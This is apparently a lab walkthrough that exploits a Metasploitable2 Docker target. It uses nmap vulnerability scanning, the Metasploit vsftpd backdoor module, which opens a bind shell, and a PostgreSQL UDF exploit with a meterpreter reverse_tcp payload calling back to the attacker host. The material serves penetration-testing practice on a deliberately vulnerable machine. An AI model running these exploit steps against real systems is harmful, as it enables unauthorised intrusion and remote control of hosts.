Metasploitable 2

Start Metasploitable2

If you haven't setup metasploitable2 yet you can follow my steps in the chapter Docker basics and Images.

docker ps -a

docker start meta2

docker ps

docker exec -it meta2 /bin/bash

hostname -i

nmap vulnerability scan

sudo nmap -T5 -Pn -n -v -sS -sV --script "vuln OR default" --open -oA ./vulscan_nmap_meta2 172.17.0.2

Wait until scan is finished:

xsltproc vulscan_nmap_meta2.xml -o vulscan_nmap_meta2.html

36KB

vulscan_nmap_meta2.html

Exploit vsftpd service

searchsploit vsftpd

exploit search with searchsploit

msfconsole

search vsftpd

use 0

set rhost 172.17.0.2

exploit

We have a bindshell:

netstat -ntpla shows bind shell process on port 6200

bind shell from msf console

Exploit postgresSQL

From the vulnerability report we can see that a postgresSQL Service is running on the target system.

PostgresSQL is vulnerable to exploit

Let's enumerate the PostgresSQL Version of our target:

use auxiliary/scanner/postgres/postgres_version

set rhosts 172.17.0.2

exploit

PostgresSQL Version 8.3.1

search postgres

There is a exploit available

use 13

info

Description: On some default Linux installations of PostgreSQL, the postgres service account may write to the /tmp directory, and may source UDF Shared Libraries from there as well, allowing execution of arbitrary code. This module compiles a Linux shared object file, uploads it to the target host via the UPDATE pg_largeobject method of binary injection, and creates a UDF (user defined function) from that shared object. Because the payload is run as the shared object's constructor, it does not need to conform to specific Postgres API versions.

set lhost 172.17.0.1

set rhost 172.17.0.2

(We leave the default payload --> linux/x86/meterpreter/reverse_tcp)

exploit -j

sessions

meterpreter reverseshell is established

session 3 is my meterpreter shell

sessions -i 3

Now you can explore the options